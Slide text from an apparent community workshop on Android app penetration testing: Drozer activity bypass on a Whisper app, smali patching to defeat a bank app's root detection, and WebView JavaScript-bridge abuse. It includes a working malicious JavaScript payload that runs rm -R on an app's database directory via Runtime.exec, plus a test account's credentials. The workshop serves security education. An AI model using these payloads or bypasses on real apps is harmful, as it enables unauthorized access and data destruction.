Disclaimer
-
This Presentation is intended for educational purposes only
and I cannot be held liable for any kind of damages done whatsoever to your
machine, or other damages.
- Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly.
- Feel free to use this presentation for practice or education
purpose.
- It's no way related to my employer - its my own research and ideas.
^ I hope - You gotcha ^
Humla
Means 'attack' in Hindi
Social Media feed
Hashtag for this session
#NullHumla, #MobileSecurity
: Twitter handle for feedback :
@null0x00 @Abhinav_Sejpal
~ We aren't going to do this ~
So, feel free to stop when you have a doubt!
Are you Ready to Rock ???
The Mobile market is fragmented, stakeholders want their better cheaper faster mobile app - Correct?
What is if it's has Vulnerable code? WOW :D
- Yet to update the stats -
Development Plan
Android Architecture
Our Arsenal
Prerequisites Checks
- Genymotion Emulator
- Santoku Linux / Appie / Android Tamer
- Copy of Shared APK(s) : Here
Drozer Framework
Introduction
- Drozer Server
- Drozer Agent
Bypass the activity validation
run app.activity.start --component sh.whisper sh.whisper.WInboxActivity
Self-Practice Session
Challenge 1 – Bypass the fix authorization for the whisper App
nulltest2015@yahoo.in - Password!
Can we replicate this issue for the LinkedIn / Hike App ?
Linkedin Insecure data stroage
Install the Bank App
Oh No - I can't use the App due to rooted device :(
Smali code Analysis
Step 1. Reversing the APK to the JAR File (JavA file)
dex2jar-2.0/d2j-dex2jar.sh bank.apk
Step 2
Read Jar using JD-GUI
jd-gui bank-dex2jar.jar
Step 3
Reversing the apk to the smali code
java -jar apktool_2.0.0.jar d bank.apk
4. Locate the code which detects the Root
5. Locate same logic in Jar
Step 6. Prepare logical patch
We can't patch the Java code and get the binary
- We have to patch the smali code with new logic of isRooted
7. New logic is available in smali
8. Fix the smali code
9. Rebuild the binary
10. Create Self-signed certificate
http://developer.android.com/tools/publishing/app-signing.html
11. Sign apk with jar signer
12. Check - Root detection
* Updated apk has patched code *
~ Summary ~
-
Demo on Missing Root Detection - Done
-
Demo on Reversing the APK - Done
-
Demo on rebuild the APK - Done
-
Demo on weak Binary - Done
- Fix : Use the Dex Guard not the pro guard
-
Update the logical validation - Done
-
Identify attack surface at Smali code - Done
-
Demo on Patch the Smali code - Done
-
Demo on APK signing - Done
- Finally done the root detection bypass - Done
Android Web-view
Android allows apps to create a bridge in order to render HTML , javascript code and allow interacting with the java codes of the application using WebKit open source web browser engine
70% of applications use WebViews
There is Tweak with usage
-
Disable Support for JavaScript
-
Disable Support for Plugins
- Disable File System Access
Well - HTTP VS HTTPS
webview = new WebView(this); webview.getSettings().setJavaScriptEnabled(false);
Identify the App with the webkit
- Reverse the binary -
Find the webview code with addJavascriptinterface enabled
- Remember it's smali code -
Identify and understand the activity with javascript enable at Clean Java code
Verify Network is Malicious ?
HTTP VS Vulnerable HTTPS VS HTTPS
Edit the Response from cloud server (Man In middle)
Malicious JS Vector
<script>
var path = '/data/data/com.box.android/databases/---';
function execute(cmd){
document.write("WebView Vulnerability");
return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/rm', '-R', path]);
</script>
Boom - Command has executed successfully
Bypass the Activity
+
API Attacks with VK App
We need you!
-
Attend Null Meets-up & give presentations.
-
Share your ideas & leanings.
-
Talk to our community champions.
-
Your feedback helps us to build a good community.
-
Looking forward for your ongoing support.
Say 'Hello' @null0x00
! Thank you !
@anantshri @oldmanlab @adi1391 @prateekg147
@5h1vang @exploitprotocol
#Nullblr Leads & Champions
Big thank you to @null0x00, Satish, Apoorva & you All
